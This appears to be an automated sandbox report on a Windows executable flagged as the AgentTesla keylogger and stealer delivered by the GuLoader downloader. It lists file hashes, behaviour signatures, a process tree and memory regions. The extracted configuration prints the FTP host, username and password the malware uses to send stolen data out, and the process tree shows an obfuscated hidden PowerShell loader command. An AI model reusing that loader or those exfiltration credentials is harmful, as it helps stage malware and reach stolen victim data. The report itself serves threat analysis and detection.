Overview

overview

10

Static

static

1

844d1e148e...41.exe

windows7-x64

10

844d1e148e...41.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    131s
  • max time network
    139s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231127-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231127-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-12-2023 02:17

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe

  • Size

    699KB

  • MD5

    9444e71802e12684478363233fd62c92

  • SHA1

    f2b4bd9162b591b2a2f4202934145864e16053fb

  • SHA256

    844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41

  • SHA512

    fec573d2b453086f2ed0b8b11824e4626fb3712134a707f100b9b2704c489fffc1259646979b0c7ebeb032421163b35beed13d2772ac02a7dd08bf7723821805

  • SSDEEP

    12288:WwFGHEXEzFGj9F5qx5DJlm2HlzYmdMylgimtdYM3O0V7bbJ:W5HEXl9y1lrz7lgZtub0V7B

Score
10/10
agentteslaguloaderdownloaderkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     ftp
  • Host:
    ftp://ftp.vvspijkenisse.nl
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

    keyloggertrojanstealerspywareagenttesla
  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe
    "C:\Users\Admin\AppData\Local\Temp\844d1e148e8c3b897bb0443f74b1bde3da7715e2aeb88d31c8c806da7e447b41.exe"
    1⤵
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:1552
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Obscurantic=Get-Content 'C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple';$Ejendomsselskab=$Obscurantic.SubString(49841,3);.$Ejendomsselskab($Obscurantic)"
      2⤵
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3600
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
        3⤵
        • Suspicious use of NtCreateThreadExHideFromDebugger
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1308
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1308 -s 1868
          4⤵
          • Program crash
          PID:2272
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 1308 -ip 1308
    1⤵
      PID:2644

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\Rkkens.ini
      Filesize

      32B

      MD5

      a8ca1db6ae34f5e5c152094f44f92476

      SHA1

      9fe0fd4e6907c4f9099d2533c3bade4ffa0968e7

      SHA256

      1f0dbc97d6570f2f5a1e18f82842c9a0007e568ca8fb768c123637ef5077aad3

      SHA512

      e48e987e1f8297b17f7fb5b8b34da6131156834310987600b20b0dcff4c43632ccb4b2305030a4a999f783176d480c8300e6aef92afbb2032379eca6dac88b5a

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_csvomquz.f33.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Indoperere.Bag
      Filesize

      299KB

      MD5

      740aba5e4e37d6e24e6322b0fb20b7e7

      SHA1

      6b92a45c9b518e1fe51192c27bd81db51f2b90d4

      SHA256

      a47e49459ad8874693970dbe048982e5afd0ffee2644e03a3ac147be2d012609

      SHA512

      2aca469279d46bbfc84fac52ee8ebdf8b58256f9009e7651480bc8d0fb07327107ee71e526783e8553e499f38a4b977de3e3fdadd4bbda9c8df37423a21c81f3

      Download Submit

    • C:\Users\Admin\AppData\Roaming\gregerss\dagbger\Thermistor\Bruseren.Ple
      Filesize

      48KB

      MD5

      b37bbcef093ffdd4c3be4dc919f6e830

      SHA1

      5ef5132e6f4021d672ba3844d2542e2258d22b72

      SHA256

      0c0dcc2234bc3f9baf5c35eb8ea2a77ca0e93015a6cb05de69890893a4b6daad

      SHA512

      9e8a8e2b84f366c0fc2edfa43c6781e88f99621549f0564efadd9d8facc975d1bbab048663b7c6e13ff53444d4f98d058664040dd6c67fde01a7500f38f3a9ba

      Download Submit

    • memory/1308-205-0x0000000000F00000-0x000000000335A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/1308-207-0x0000000077C61000-0x0000000077D81000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/1308-218-0x0000000074000000-0x00000000747B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1308-214-0x000000001F4E0000-0x000000001F4F0000-memory.dmp

      Filesize

      64KB

      Download

    • memory/1308-212-0x000000006EE00000-0x000000006EE40000-memory.dmp

      Filesize

      256KB

      Download

    • memory/1308-211-0x0000000074000000-0x00000000747B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/1308-209-0x0000000000F00000-0x000000000335A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/1308-208-0x000000006EE00000-0x0000000070054000-memory.dmp

      Filesize

      18.3MB

      Download

    • memory/1308-206-0x0000000077CE8000-0x0000000077CE9000-memory.dmp

      Filesize

      4KB

      Download

    • memory/1308-216-0x0000000000F00000-0x000000000335A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/3600-190-0x0000000008170000-0x0000000008714000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/3600-172-0x00000000061B0000-0x0000000006216000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3600-189-0x0000000006E70000-0x0000000006E92000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3600-203-0x0000000077C61000-0x0000000077D81000-memory.dmp

      Filesize

      1.1MB

      Download

    • memory/3600-168-0x0000000003290000-0x00000000032C6000-memory.dmp

      Filesize

      216KB

      Download

    • memory/3600-192-0x0000000008DA0000-0x000000000941A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/3600-167-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3600-195-0x0000000007E10000-0x0000000007E14000-memory.dmp

      Filesize

      16KB

      Download

    • memory/3600-185-0x00000000069C0000-0x0000000006A0C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/3600-186-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3600-199-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3600-200-0x0000000009420000-0x000000000B87A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/3600-171-0x00000000058B0000-0x00000000058D2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/3600-202-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3600-170-0x0000000005B80000-0x00000000061A8000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/3600-204-0x0000000009420000-0x000000000B87A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/3600-166-0x0000000074000000-0x00000000747B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3600-197-0x0000000074000000-0x00000000747B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3600-187-0x0000000007B00000-0x0000000007B96000-memory.dmp

      Filesize

      600KB

      Download

    • memory/3600-184-0x0000000006930000-0x000000000694E000-memory.dmp

      Filesize

      120KB

      Download

    • memory/3600-179-0x0000000006290000-0x00000000065E4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/3600-210-0x0000000074000000-0x00000000747B0000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/3600-169-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download

    • memory/3600-173-0x0000000006220000-0x0000000006286000-memory.dmp

      Filesize

      408KB

      Download

    • memory/3600-213-0x0000000009420000-0x000000000B87A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/3600-188-0x0000000006E20000-0x0000000006E3A000-memory.dmp

      Filesize

      104KB

      Download

    • memory/3600-198-0x0000000009420000-0x000000000B87A000-memory.dmp

      Filesize

      36.4MB

      Download

    • memory/3600-201-0x0000000005540000-0x0000000005550000-memory.dmp

      Filesize

      64KB

      Download